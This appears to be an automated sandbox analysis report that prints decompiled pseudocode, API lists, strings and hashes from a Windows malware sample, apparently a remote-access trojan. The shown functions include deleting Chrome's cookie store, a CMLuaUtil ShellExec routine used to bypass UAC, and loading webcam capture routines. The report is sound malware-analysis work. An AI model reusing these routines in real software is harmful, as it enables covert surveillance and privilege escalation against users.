                    • GetLastError.KERNEL32(?,?,00439D61,00438CCE), ref: 00439D78
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00439D86
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00439D9F
                    • SetLastError.KERNEL32(00000000,?,00439D61,00438CCE), ref: 00439DF1
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 75ea8c6ff2decac97428509ad1205c0cc4ee603b6eb495f67af89fd10ab24878
                    • Instruction ID: 5d92d9785c4aa5a9598b192e16f9870ef71e3e8c07885123fac71c8c8bf4f8c7
                    • Opcode Fuzzy Hash: 75ea8c6ff2decac97428509ad1205c0cc4ee603b6eb495f67af89fd10ab24878
                    • Instruction Fuzzy Hash: AA01D43211A7129EE6242A79BC8779B2785FB0A779F20123FF218955E1EFA94C41914C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\BiU282bjyR.exe), ref: 004074F7
                      • Part of subcall function 00407424: _wcslen.LIBCMT ref: 00407448
                      • Part of subcall function 00407424: CoGetObject.OLE32(?,00000024,00465500,00000000), ref: 004074A9
                    • CoUninitialize.OLE32 ref: 00407550
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitializeObjectUninitialize_wcslen
                    • String ID: C:\Users\user\Desktop\BiU282bjyR.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                    • API String ID: 3851391207-2794275783
                    • Opcode ID: 90f9504da5622f3e7470c73654c82dbaafbcabb1f2373d5d2fe1a2eb92223501
                    • Instruction ID: 3745ae845a000db998d480ab9f49fc8fa10eefccf75ce803fc14448be253abc7
                    • Opcode Fuzzy Hash: 90f9504da5622f3e7470c73654c82dbaafbcabb1f2373d5d2fe1a2eb92223501
                    • Instruction Fuzzy Hash: 100196727493217BE2145B11EC0AF7B7758DF8172AF10013FFA016A2C1EEA9FC01866A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0040B916(void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				long _t18;
                    				void* _t20;
                    				void* _t21;
                    				void* _t28;
                    				void* _t32;
                    				void* _t33;
                    				void* _t34;
                    
                    				_t37 = __eflags;
                    				_t32 = __edi;
                    				_t31 = E00402093(_t20,  &_v52, __edx, _t33, E0043BA9A(_t20, __eflags, "UserProfile"));
                    				E00406383(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                    				E00401FD8();
                    				if(DeleteFileA(E00401FAB( &_v28)) != 0) {
                    					_t28 = _t34 - 0x18;
                    					_push("\n[Chrome Cookies found, cleared!]");
                    					goto L6;
                    				} else {
                    					_t18 = GetLastError();
                    					if(_t18 == 0 || _t18 == 1) {
                    						_t28 = _t34 - 0x18;
                    						_push("\n[Chrome Cookies not found]");
                    						L6:
                    						E00402093(_t20, _t28, _t31, _t33);
                    						E0040C04D(_t20, _t31, _t33, __eflags);
                    						_t21 = 1;
                    					} else {
                    						_t21 = 0;
                    					}
                    				}
                    				E00401FD8();
                    				return _t21;
                    			}














                    0x0040b916
                    0x0040b916
                    0x0040b936
                    0x0040b93b
                    0x0040b944
                    0x0040b95a
                    0x0040b980
                    0x0040b982
                    0x00000000
                    0x0040b95c
                    0x0040b963
                    0x0040b966
                    0x0040b974
                    0x0040b976
                    0x0040b987
                    0x0040b987
                    0x0040b98c
                    0x0040b991
                    0x0040b96d
                    0x0040b96d
                    0x0040b96d
                    0x0040b966
                    0x0040b999
                    0x0040b9a4

                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B952
                    • GetLastError.KERNEL32 ref: 0040B95C
                    Strings
                    • UserProfile, xrefs: 0040B922
                    • [Chrome Cookies found, cleared!], xrefs: 0040B982
                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B91D
                    • [Chrome Cookies not found], xrefs: 0040B976
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    • API String ID: 2018770650-304995407
                    • Opcode ID: dced64bbba389f8ea6b339c9289ac6435bbddf7cd9f6784754dbf1c24e20cf5a
                    • Instruction ID: 315d17355d824e36be80c36bce3a0f47620cf775891b594ce92862ef886d906f
                    • Opcode Fuzzy Hash: dced64bbba389f8ea6b339c9289ac6435bbddf7cd9f6784754dbf1c24e20cf5a
                    • Instruction Fuzzy Hash: 330184B1A802059ACA04B7B6DC6BDBE7724DA11304F50027FF902721E2EE7D490586DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00407187(void* __esi) {
                    				int _t5;
                    				void* _t7;
                    				void* _t8;
                    				void* _t13;
                    				void* _t20;
                    
                    				_t20 =  *0x4709d0 - 1; // 0x1
                    				if(_t20 != 0) {
                    					__eflags =  *0x4709d0 - 1;
                    					if(__eflags != 0) {
                    						CloseHandle( *0x471d44);
                    						__eflags = E004076DE(__eflags);
                    						if(__eflags == 0) {
                    							_t13 = 0x471b38;
                    						} else {
                    							_t13 = E00401F04(0x4742c0);
                    						}
                    						_t5 = E00407594(_t13, 0x46b928, __eflags);
                    						__eflags = _t5;
                    						if(_t5 == 0) {
                    							ExitProcess(_t5);
                    						}
                    						_t7 = CreateMutexA(0, 1, E00401FAB(0x474308));
                    						 *0x471d44 = _t7;
                    						_t8 = 2;
                    						return _t8;
                    					} else {
                    						__eflags = 1;
                    						return 1;
                    					}
                    				} else {
                    					return 1;
                    				}
                    			}








                    0x0040718a
                    0x00407190
                    0x004075b1
                    0x004075b8
                    0x004075c5
                    0x004075dc
                    0x004075de
                    0x004075eb
                    0x004075e0
                    0x004075e7
                    0x004075e7
                    0x004075f0
                    0x004075f6
                    0x004075f8
                    0x004075fb
                    0x004075fb
                    0x00407610
                    0x00407618
                    0x0040761d
                    0x0040761e
                    0x004075ba
                    0x004075bc
                    0x004075bd
                    0x004075bd
                    0x00407196
                    0x00407196
                    0x00407196

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\BiU282bjyR.exe$EGiy6hf-YWJYTZ$X2}
                    • API String ID: 0-1880202412
                    • Opcode ID: f65f8571d6ec65db301423f884dd54541d9a4224354b35fc14cec3d7a9d5dfd4
                    • Instruction ID: 02920a013ddee31ceffd9a7e46d8f0b16fc8a6a02f9f920b07f0e011a975ae71
                    • Opcode Fuzzy Hash: f65f8571d6ec65db301423f884dd54541d9a4224354b35fc14cec3d7a9d5dfd4
                    • Instruction Fuzzy Hash: C3F096B0E15601EBDF1427645C196FA3615EB80746F00487BF90AFA6E2EF3D9841865E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E0043A4EC(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                    				intOrPtr _v0;
                    				char _v8;
                    				signed int _v12;
                    				char _v16;
                    				signed int _v20;
                    				char _v24;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t61;
                    				void* _t64;
                    				signed int _t67;
                    				signed int _t69;
                    				signed int _t70;
                    				signed int _t73;
                    				signed int _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				intOrPtr _t80;
                    				signed int _t81;
                    				void* _t82;
                    				signed int _t84;
                    				void* _t85;
                    				signed int _t87;
                    				signed int _t93;
                    				signed int _t102;
                    				void* _t104;
                    				signed int _t107;
                    				signed int* _t110;
                    				signed int* _t111;
                    				intOrPtr* _t113;
                    				signed int _t118;
                    				signed int _t120;
                    				signed int _t123;
                    				void* _t125;
                    				signed int _t128;
                    				signed int _t131;
                    				signed int _t139;
                    				signed int _t145;
                    				void _t147;
                    				void* _t148;
                    				void* _t150;
                    				void* _t152;
                    				signed int _t153;
                    				signed int _t154;
                    				void* _t155;
                    				signed int _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    
                    				_t139 = __edx;
                    				_t155 = _a4;
                    				if(_t155 == 0) {
                    					_t113 = E0043FFBD();
                    					_t159 = 0x16;
                    					 *_t113 = _t159;
                    					E0043B6B0();
                    					return _t159;
                    				}
                    				_push(__edi);
                    				_t123 = 9;
                    				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                    				_t145 = _a8;
                    				__eflags = _t145;
                    				if(_t145 == 0) {
                    					_t111 = E0043FFBD();
                    					_t158 = 0x16;
                    					 *_t111 = _t158;
                    					E0043B6B0();
                    					_t78 = _t158;
                    					L12:
                    					return _t78;
                    				}
                    				_push(__ebx);
                    				__eflags =  *(_t145 + 4);
                    				if(__eflags <= 0) {
                    					if(__eflags < 0) {
                    						L10:
                    						_t110 = E0043FFBD();
                    						_t157 = 0x16;
                    						 *_t110 = _t157;
                    						_t78 = _t157;
                    						L11:
                    						goto L12;
                    					}
                    					__eflags =  *_t145;
                    					if( *_t145 < 0) {
                    						goto L10;
                    					}
                    				}
                    				_t64 = 7;
                    				__eflags =  *(_t145 + 4) - _t64;
                    				if(__eflags >= 0) {
                    					if(__eflags > 0) {
                    						goto L10;
                    					}
                    					__eflags =  *_t145 - 0x93406fff;
                    					if(__eflags > 0) {
                    						goto L10;
                    					}
                    				}
                    				E00448FAF(0, _t145, _t155, __eflags);
                    				_v12 = 0;
                    				_v16 = 0;
                    				_v8 = 0;
                    				_t67 = E004487E4( &_v12);
                    				_pop(_t125);
                    				__eflags = _t67;
                    				if(_t67 == 0) {
                    					_t75 = E00448810( &_v16);
                    					_pop(_t125);
                    					__eflags = _t75;
                    					if(_t75 == 0) {
                    						_t77 = E0044883C( &_v8);
                    						_pop(_t125);
                    						__eflags = _t77;
                    						if(_t77 == 0) {
                    							_t118 =  *(_t145 + 4);
                    							_t128 =  *_t145;
                    							__eflags = _t118;
                    							if(__eflags < 0) {
                    								L28:
                    								_push(_t145);
                    								_push(_t155);
                    								_t78 = E00442437();
                    								__eflags = _t78;
                    								if(_t78 != 0) {
                    									goto L11;
                    								}
                    								__eflags = _v12;
                    								asm("cdq");
                    								_t147 =  *_t155;
                    								_t120 = _t139;
                    								if(__eflags == 0) {
                    									L32:
                    									_t80 = _v8;
                    									L33:
                    									asm("cdq");
                    									_t148 = _t147 - _t80;
                    									asm("sbb ebx, edx");
                    									_t81 = E00457000(_t148, _t120, 0x3c, 0);
                    									 *_t155 = _t81;
                    									__eflags = _t81;
                    									if(_t81 < 0) {
                    										_t148 = _t148 + 0xffffffc4;
                    										 *_t155 = _t81 + 0x3c;
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t82 = E00456F50(_t148, _t120, 0x3c, 0);
                    									_t121 = _t139;
                    									_t28 = _t155 + 4; // 0x848d0046
                    									asm("cdq");
                    									_t150 = _t82 +  *_t28;
                    									asm("adc ebx, edx");
                    									_t84 = E00457000(_t150, _t139, 0x3c, 0);
                    									 *(_t155 + 4) = _t84;
                    									__eflags = _t84;
                    									if(_t84 < 0) {
                    										_t150 = _t150 + 0xffffffc4;
                    										 *(_t155 + 4) = _t84 + 0x3c;
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t85 = E00456F50(_t150, _t121, 0x3c, 0);
                    									_t122 = _t139;
                    									_t31 = _t155 + 8; // 0xa824
                    									asm("cdq");
                    									_t152 = _t85 +  *_t31;
                    									asm("adc ebx, edx");
                    									_t87 = E00457000(_t152, _t139, 0x18, 0);
                    									 *(_t155 + 8) = _t87;
                    									__eflags = _t87;
                    									if(_t87 < 0) {
                    										_t152 = _t152 + 0xffffffe8;
                    										 *(_t155 + 8) = _t87 + 0x18;
                    										asm("adc ebx, 0xffffffff");
                    									}
                    									_t131 = E00456F50(_t152, _t122, 0x18, 0);
                    									__eflags = _t139;
                    									if(__eflags < 0) {
                    										L48:
                    										_t44 = _t155 + 0x18; // 0xa024848d
                    										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                    										asm("cdq");
                    										_t153 = 7;
                    										_t51 = _t155 + 0xc; // 0x50506a00
                    										_t93 =  *_t51;
                    										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                    										__eflags = _t93;
                    										if(_t93 > 0) {
                    											goto L43;
                    										}
                    										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                    										 *(_t155 + 0xc) = _t93 + 0x1f;
                    										_t55 = _t131 + 0x16d; // 0x16d
                    										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                    										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                    										goto L44;
                    									} else {
                    										if(__eflags > 0) {
                    											L42:
                    											_t34 = _t155 + 0x18; // 0xa024848d
                    											asm("cdq");
                    											_t154 = 7;
                    											_t39 = _t155 + 0xc;
                    											 *_t39 =  *(_t155 + 0xc) + _t131;
                    											__eflags =  *_t39;
                    											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                    											L43:
                    											_t42 = _t155 + 0x1c;
                    											 *_t42 =  *(_t155 + 0x1c) + _t131;
                    											__eflags =  *_t42;
                    											L44:
                    											_t78 = 0;
                    											goto L11;
                    										}
                    										__eflags = _t131;
                    										if(_t131 == 0) {
                    											__eflags = _t139;
                    											if(__eflags > 0) {
                    												goto L44;
                    											}
                    											if(__eflags < 0) {
                    												goto L48;
                    											}
                    											__eflags = _t131;
                    											if(_t131 >= 0) {
                    												goto L44;
                    											}
                    											goto L48;
                    										}
                    										goto L42;
                    									}
                    								}
                    								_push(_t155);
                    								_t102 = E00449000(_t120, _t147, _t155, __eflags);
                    								__eflags = _t102;
                    								if(_t102 == 0) {
                    									goto L32;
                    								}
                    								_t80 = _v8 + _v16;
                    								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                    								goto L33;
                    							}
                    							if(__eflags > 0) {
                    								L20:
                    								_t104 = 7;
                    								__eflags = _t118 - _t104;
                    								if(__eflags > 0) {
                    									goto L28;
                    								}
                    								if(__eflags < 0) {
                    									L23:
                    									asm("cdq");
                    									_push( &_v24);
                    									asm("sbb ebx, edx");
                    									_v24 = _t128 - _v8;
                    									_push(_t155);
                    									_v20 = _t118;
                    									_t78 = E00442437();
                    									__eflags = _t78;
                    									if(_t78 != 0) {
                    										goto L11;
                    									}
                    									__eflags = _v12 - _t78;
                    									if(__eflags == 0) {
                    										goto L44;
                    									}
                    									_push(_t155);
                    									_t107 = E00449000(_t118, _t145, _t155, __eflags);
                    									__eflags = _t107;
                    									if(_t107 == 0) {
                    										goto L44;
                    									}
                    									asm("cdq");
                    									_v24 = _v24 - _v16;
                    									_push( &_v24);
                    									asm("sbb [ebp-0x10], edx");
                    									_push(_t155);
                    									_t78 = E00442437();
                    									__eflags = _t78;
                    									if(_t78 != 0) {
                    										goto L11;
                    									}
                    									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                    									goto L44;
                    								}
                    								__eflags = _t128 - 0x933c7b7f;
                    								if(_t128 >= 0x933c7b7f) {
                    									goto L28;
                    								}
                    								goto L23;
                    							}
                    							__eflags = _t128 - 0x3f480;
                    							if(_t128 <= 0x3f480) {
                    								goto L28;
                    							}
                    							goto L20;
                    						}
                    					}
                    				}
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				E0043B6DD();
                    				asm("int3");
                    				_push(_t155);
                    				_t69 = E004423D2(_t125);
                    				_t156 = _t69;
                    				__eflags = _t156;
                    				if(_t156 != 0) {
                    					_push(_v0);
                    					_t70 = E0043A4EC(0, _t139, _t145, _t156);
                    					asm("sbb eax, eax");
                    					_t73 =  !( ~_t70) & _t156;
                    					__eflags = _t73;
                    					return _t73;
                    				}
                    				return _t69;
                    			}




















































                    0x0043a4ec
                    0x0043a4f5
                    0x0043a4fa
                    0x0043a4fc
                    0x0043a503
                    0x0043a504
                    0x0043a506
                    0x00000000
                    0x0043a50b
                    0x0043a50f
                    0x0043a517
                    0x0043a518
                    0x0043a51a
                    0x0043a51d
                    0x0043a51f
                    0x0043a521
                    0x0043a528
                    0x0043a529
                    0x0043a52b
                    0x0043a530
                    0x0043a561
                    0x00000000
                    0x0043a561
                    0x0043a534
                    0x0043a537
                    0x0043a53a
                    0x0043a53c
                    0x0043a554
                    0x0043a554
                    0x0043a55b
                    0x0043a55c
                    0x0043a55e
                    0x0043a560
                    0x00000000
                    0x0043a560
                    0x0043a53e
                    0x0043a540
                    0x00000000
                    0x00000000
                    0x0043a540
                    0x0043a544
                    0x0043a545
                    0x0043a548
                    0x0043a54a
                    0x00000000
                    0x00000000
                    0x0043a54c
                    0x0043a552
                    0x00000000
                    0x00000000
                    0x0043a552
                    0x0043a567
                    0x0043a56f
                    0x0043a573
                    0x0043a576
                    0x0043a579
                    0x0043a57e
                    0x0043a57f
                    0x0043a581
                    0x0043a58b
                    0x0043a590
                    0x0043a591
                    0x0043a593
                    0x0043a59d
                    0x0043a5a2
                    0x0043a5a3
                    0x0043a5a5
                    0x0043a5ab
                    0x0043a5ae
                    0x0043a5b0
                    0x0043a5b2
                    0x0043a633
                    0x0043a633
                    0x0043a634
                    0x0043a635
                    0x0043a63c
                    0x0043a63e
                    0x00000000
                    0x00000000
                    0x0043a644
                    0x0043a64a
                    0x0043a64b
                    0x0043a64d
                    0x0043a64f
                    0x0043a66b
                    0x0043a66b
                    0x0043a66e
                    0x0043a66e
                    0x0043a66f
                    0x0043a675
                    0x0043a679
                    0x0043a67e
                    0x0043a680
                    0x0043a682
                    0x0043a687
                    0x0043a68a
                    0x0043a68c
                    0x0043a68c
                    0x0043a695
                    0x0043a69c
                    0x0043a69e
                    0x0043a6a1
                    0x0043a6a2
                    0x0043a6a8
                    0x0043a6ac
                    0x0043a6b1
                    0x0043a6b4
                    0x0043a6b6
                    0x0043a6bb
                    0x0043a6be
                    0x0043a6c1
                    0x0043a6c1
                    0x0043a6ca
                    0x0043a6d1
                    0x0043a6d3
                    0x0043a6d6
                    0x0043a6d7
                    0x0043a6dd
                    0x0043a6e1
                    0x0043a6e6
                    0x0043a6e9
                    0x0043a6eb
                    0x0043a6f0
                    0x0043a6f3
                    0x0043a6f6
                    0x0043a6f6
                    0x0043a704
                    0x0043a706
                    0x0043a708
                    0x0043a735
                    0x0043a735
                    0x0043a73b
                    0x0043a742
                    0x0043a743
                    0x0043a746
                    0x0043a746
                    0x0043a749
                    0x0043a74c
                    0x0043a74e
                    0x00000000
                    0x00000000
                    0x0043a753
                    0x0043a75a
                    0x0043a75d
                    0x0043a763
                    0x0043a766
                    0x00000000
                    0x0043a70a
                    0x0043a70a
                    0x0043a710
                    0x0043a710
                    0x0043a717
                    0x0043a718
                    0x0043a71b
                    0x0043a71b
                    0x0043a71b
                    0x0043a71e
                    0x0043a721
                    0x0043a721
                    0x0043a721
                    0x0043a721
                    0x0043a724
                    0x0043a724
                    0x00000000
                    0x0043a724
                    0x0043a70c
                    0x0043a70e
                    0x0043a72b
                    0x0043a72d
                    0x00000000
                    0x00000000
                    0x0043a72f
                    0x00000000
                    0x00000000
                    0x0043a731
                    0x0043a733
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043a733
                    0x00000000
                    0x0043a70e
                    0x0043a708
                    0x0043a651
                    0x0043a652
                    0x0043a658
                    0x0043a65a
                    0x00000000
                    0x00000000
                    0x0043a65f
                    0x0043a662
                    0x00000000
                    0x0043a662
                    0x0043a5b4
                    0x0043a5be
                    0x0043a5c0
                    0x0043a5c1
                    0x0043a5c3
                    0x00000000
                    0x00000000
                    0x0043a5c5
                    0x0043a5cf
                    0x0043a5d2
                    0x0043a5d8
                    0x0043a5d9
                    0x0043a5db
                    0x0043a5de
                    0x0043a5df
                    0x0043a5e2
                    0x0043a5e9
                    0x0043a5eb
                    0x00000000
                    0x00000000
                    0x0043a5f1
                    0x0043a5f4
                    0x00000000
                    0x00000000
                    0x0043a5fa
                    0x0043a5fb
                    0x0043a601
                    0x0043a603
                    0x00000000
                    0x00000000
                    0x0043a60c
                    0x0043a60d
                    0x0043a613
                    0x0043a614
                    0x0043a617
                    0x0043a618
                    0x0043a61f
                    0x0043a621
                    0x00000000
                    0x00000000
                    0x0043a627
                    0x00000000
                    0x0043a627
                    0x0043a5c7
                    0x0043a5cd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043a5cd
                    0x0043a5b6
                    0x0043a5bc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043a5bc
                    0x0043a5a5
                    0x0043a593
                    0x0043a76b
                    0x0043a76c
                    0x0043a76d
                    0x0043a76e
                    0x0043a76f
                    0x0043a770
                    0x0043a775
                    0x0043a77b
                    0x0043a77c
                    0x0043a781
                    0x0043a783
                    0x0043a785
                    0x0043a787
                    0x0043a78b
                    0x0043a793
                    0x0043a798
                    0x0043a798
                    0x00000000
                    0x0043a798
                    0x0043a79c

                    APIs
                    • __allrem.LIBCMT ref: 0043A679
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043A695
                    • __allrem.LIBCMT ref: 0043A6AC
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043A6CA
                    • __allrem.LIBCMT ref: 0043A6E1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043A6FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: aa7405db689ced29d82c75238fce2cdccf5c5cfd90d129462b64dcd68f383cce
                    • Instruction ID: 70640e2171604491e95288d59f983b69c1e8f11b9b0353195faa56df0881143f
                    • Opcode Fuzzy Hash: aa7405db689ced29d82c75238fce2cdccf5c5cfd90d129462b64dcd68f383cce
                    • Instruction Fuzzy Hash: 51812A72A40705ABE720AA69CC82B5F73F89F48768F18512FF491C62D1EB7CDD10874A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E00404371(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, char** _a4, signed int _a8, intOrPtr _a12) {
                    				char _v4;
                    				void* _v36;
                    				char _v40;
                    				char _v48;
                    				char _v52;
                    				char _v56;
                    				char _v72;
                    				void* __esi;
                    				void* _t24;
                    				char** _t26;
                    				intOrPtr* _t28;
                    				char* _t36;
                    				intOrPtr _t46;
                    				signed int _t55;
                    				signed int _t57;
                    				char* _t60;
                    				void* _t63;
                    				signed int _t64;
                    				void* _t66;
                    				signed int _t75;
                    				void* _t78;
                    				void* _t127;
                    				signed int _t129;
                    				signed int _t131;
                    				signed int _t133;
                    				signed int _t134;
                    				signed int _t135;
                    				signed int _t136;
                    				void* _t139;
                    				signed int _t140;
                    				char* _t142;
                    				signed int _t144;
                    				void* _t147;
                    				void* _t148;
                    				intOrPtr* _t149;
                    
                    				_push(__edi);
                    				_t122 = _a8;
                    				_t127 = __ecx;
                    				_t24 = E004027AC(__ecx, _a8);
                    				_t78 = _t127;
                    				_t156 = _t24;
                    				if(_t24 == 0) {
                    					_push(__ebx);
                    					E00402888(_t78, __edx, _t139, 0);
                    					_t26 = E0040223D();
                    					_t75 = _a8;
                    					_a4 = _t26;
                    					_t117 =  *_t26;
                    					__eflags =  !_t117 - _t75;
                    					if( !_t117 <= _t75) {
                    						E004028A4(_t127, _t139);
                    						asm("int3");
                    						_t140 = _t144;
                    						_push(_t127);
                    						_t28 = E00401FAB( &_v4);
                    						E004041A2( &_v4,  &_v40, 4, 0xffffffff);
                    						_t147 = (_t144 & 0xfffffff8) - 0xc;
                    						E004020F6(_t75, _t147, _t117, __eflags, 0x473ec8);
                    						_t148 = _t147 - 0x18;
                    						E004020F6(_t75, _t148, _t117, __eflags,  &_v56);
                    						E0041B8B0( &_v72, _t117);
                    						_t149 = _t148 + 0x30;
                    						_t129 =  *_t28 - 0x3c;
                    						__eflags = _t129;
                    						if(__eflags == 0) {
                    							E00401E65( &_v48, _t117, _t140, __eflags, 0);
                    							_t36 = E0040247C();
                    							E00401FAB(E00401E65( &_v52, _t117, _t140, __eflags, 0));
                    							_t117 = _t36;
                    							_t131 = E00411AFB();
                    							__eflags = _t131;
                    							if(_t131 != 0) {
                    								 *0x471ad4 = E00411D70(_t131, "OpenCamera");
                    								 *0x471ad0 = E00411D70(_t131, "CloseCamera");
                    								_t46 = E00411D70(_t131, "GetFrame");
                    								_t117 = "FreeFrame";
                    								 *0x471ad8 = _t46;
                    								 *0x471acc = E00411D70(_t131, "FreeFrame");
                    								 *0x471aba = 1;
                    								E004020F6(_t75, _t149 - 0x18, "FreeFrame", __eflags, 0x473e30);
                    								_push(0x1b);
                    								goto L23;
                    							}
                    						} else {
                    							_t133 = _t129 - 1;
                    							__eflags = _t133;
                    							if(_t133 == 0) {
                    								__eflags =  *0x471a87;
                    								if(__eflags != 0) {
                    									goto L20;
                    								}
                    							} else {
                    								_t134 = _t133 - 1;
                    								__eflags = _t134;
                    								if(_t134 == 0) {
                    									 *0x471ad0();
                    									 *0x471a87 = 0;
                    								} else {
                    									_t135 = _t134 - 1;
                    									__eflags = _t135;
                    									if(_t135 == 0) {
                    										_t55 =  *0x471ad4();
                    										 *0x471a87 = _t55;
                    										__eflags = _t55;
                    										if(__eflags == 0) {
                    											goto L15;
                    										} else {
                    											L20:
                    											_t117 = E0043B4A1(_t50, E00401FAB(E00401E65( &_v48, _t117, _t140, __eflags, 0)));
                    											E00404607(_a8, _t52, __eflags);
                    										}
                    									} else {
                    										_t136 = _t135 - 1;
                    										__eflags = _t136;
                    										if(_t136 == 0) {
                    											_t57 =  *0x471ad4();
                    											 *0x471a87 = _t57;
                    											__eflags = _t57;
                    											if(__eflags == 0) {
                    												L15:
                    												E004020F6(_t75, _t149 - 0x18, _t117, __eflags, 0x473e30);
                    												_push(0x41);
                    												L23:
                    												E00404AA1(_a8, _t117, __eflags);
                    											} else {
                    												_t60 = E0043B4A1(_t58, E00401FAB(E00401E65( &_v48, _t117, _t140, __eflags, _t136)));
                    												 *_t149 = 0x3e8;
                    												Sleep(??);
                    												_t117 = _t60;
                    												E00404607(_a8, _t60, __eflags);
                    												 *0x471ad0();
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    						_t21 =  &_v48; // 0x473e30
                    						E00401E8D(_t21, _t117);
                    						E00401FD8();
                    						E00401FD8();
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						_push(_t139);
                    						_t142 =  &(_t117[_t75]);
                    						__eflags = _t75;
                    						if(_t75 != 0) {
                    							_t64 = E004027E6(_t75, _t127, _t117, _t122, _t142, 0);
                    							__eflags = _t64;
                    							if(_t64 != 0) {
                    								_t66 = E0040222A(_t127);
                    								E004015C6(E0040222A(_t127) + _t75 * 2, _t66,  *_a8);
                    								E004015B2(E0040222A(_t127), _t122, _t75);
                    								E00402857(_t142);
                    							}
                    						}
                    						_t63 = _t127;
                    						goto L7;
                    					}
                    				} else {
                    					_push(_a12);
                    					_t63 = E004034E6(__ebx, _t127, __edx, _t122 - E0040222A(_t78) >> 1, _t127, _t139, _t156, _t78, _t127, _t122 - E0040222A(_t78) >> 1);
                    					L7:
                    					return _t63;
                    				}
